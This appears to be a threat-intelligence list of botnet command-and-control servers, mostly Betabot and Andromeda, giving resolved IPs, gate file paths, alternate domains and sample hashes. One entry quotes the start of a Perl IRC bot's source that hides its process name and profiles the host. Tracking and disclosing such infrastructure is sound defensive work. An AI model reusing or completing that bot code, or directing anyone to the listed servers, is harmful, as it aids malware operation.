Resolved ajw555.myjino.ru to 81.177.141.241 Server: ajw555.myjino.ru Gate file: /index.php This is the same domain as the previous madness botnet. Hosting info: http://whois.domaintools.com/81.177.141.241 Related md5s (Download sample from Malwr.com) Madness: c45034111810d1a56ba6b72acc63bdf5
dorblu99.net (WordPress bruteforcing botnet hosted by hetzner.de)
Resolved dorblu99.net to 88.198.17.49 Server: dorblu99.net Gate file: /cmd.php Hosting info: http://whois.domaintools.com/88.198.17.49 Related md5s (Download sample from Malwr.com) Malware: 1e8cd0f0f1702820c870302520bc0176
perl.jorgee.nu(5k perl bots hosted in Germany Hurth Intergenia Ag)
Credits to AliSs. $p = ""; for ($k=0;$k<1300;$k++) { $p .= ",5-$k"; } my @ps = ("ps","syslogd","init"); my $processo = $ps[rand scalar @ps]; $servidor='perl.jorgee.nu' unless $servidor; my $porta='8080'; my @canais=("#perl"); my @adms=("M","st0n3d","x00","Jack"); my $linas_max=10; my $sleep=5; my $nick = getnick(); my $ircname = "x00"; my $realname = `uname -vr`; my $uname = `uname -a`; myRead more...
xylox.su (Betabot and Andromeda http botnets hosted by Panamaserver.com)
Resolved xylox.su to 190.123.45.12 Betabot Gate file: /forums/order.php Andromeda Gate file: /foo/image.php hosting infos: http://whois.domaintools.com/190.123.45.12 Related mds5 (Download samples from Malwr.com) Betabot: a670deb3dd6febfcfda8392305041657 Andromeda: 26c7885b95501af4da1ffa621f793027
shatteredwow.com (Betabot http botnet hosted by limestonenetworks.com)
Resolved shatteredwow.com to 63.143.49.122 Server: shatteredwow.com Gate file: /beta2/order.php Alternate domains: modbrandom.netsxyza.dyndns.wsseattleschools.cocnetwork.eltsa.comthex-net.com Hosting info: http://whois.domaintools.com/63.143.49.122 Related md5s (Download sample from Malwr.com) Betabot: e5a03d368fd4fca8b45c83a05dab6ced
nomoguz.su (Betabot http botnet hosted by fastflux)
Server: nomoguz.su Gate file: /SDF9his/yefgvrtu.php Alternate domain: cooncatcher245.com The same fastflux setup is also hosting this betabot. Hosting infos: ;; QUESTION SECTION: ;nomoguz.su. IN A ;; ANSWER SECTION: nomoguz.su. 131 IN A 5.165.17.205 nomoguz.su. 131 IN A 176.194.193.47 nomoguz.su. 131 IN A 66.231.16.101 nomoguz.su. 131 IN A 145.255.33.9 nomoguz.su. 131 IN A 188.0.98.100 nomoguz.su. 131Read more...
nigazz.com (Betabot http botnet hosted by besthosting.ua)
Resolved nigazz.com to 194.28.173.217 Server: nigazz.com Gate file: /neg/order.php Alterenate domain: niggazz.com Hosting infos: http://whois.domaintools.com/194.28.173.217 Related md5s (Download sample from Malwr.com) Betabot: 7355a0c56919550566ca50e33162f993
fpsfreedom.net (Betabot http botnet hosted by alibabahost.com)
Resolved fpsfreedom.net to 37.221.170.65 Server: fpsfreedom.net Gate file: /order.php This seems to be used for increasing website and video stream views, opening up the page hxxp://www.fpsguides.com/hidden in three hidden internet explorer windows. Hosting infos: http://whois.domaintools.com/37.221.170.65 Related md5s (Download sample from Malwr.com) Betabot: 8cc7c93530430201871f07f1be3a26e6
dayzstreaming.co.uk (Betabot http botnet hosted by alibabahost.com)
Resolved dayzstreaming.co.uk to 37.221.170.194 Server: dayzstreaming.co.uk Gate file: /gato/order.php Alternate domain: dayzstreaming.org.uk Hosting info: http://whois.domaintools.com/37.221.170.194 Related md5s (Download sample from Malwr.com) Betabot: c0d2e08c3f0d964858b8a9788aa6732e
goodfluxetcwow1.com (Fastflux hosting botnet hosted by mnogobyte.ru)
Resolved goodfluxetcwow1.com to 146.255.195.104 Server: goodfluxetcwow1.com Gate file: /forum/7f4765027f274bbc95328d79fa668b75.php Alternate domains: goodfluxetcwow2.com b437571f9061b10e5d33c66c83df359e.ru This is the malware component of a fastflux hosting setup. Once installed on a computer it opens a web server on port 80 and a DNS server on port 53. Current IPs used by the setup hxxp://goodfluxetcwow1.com/system/http.php Page showing example forwarding hxxp://goodfluxetcwow1.com/system/test.phpRead more...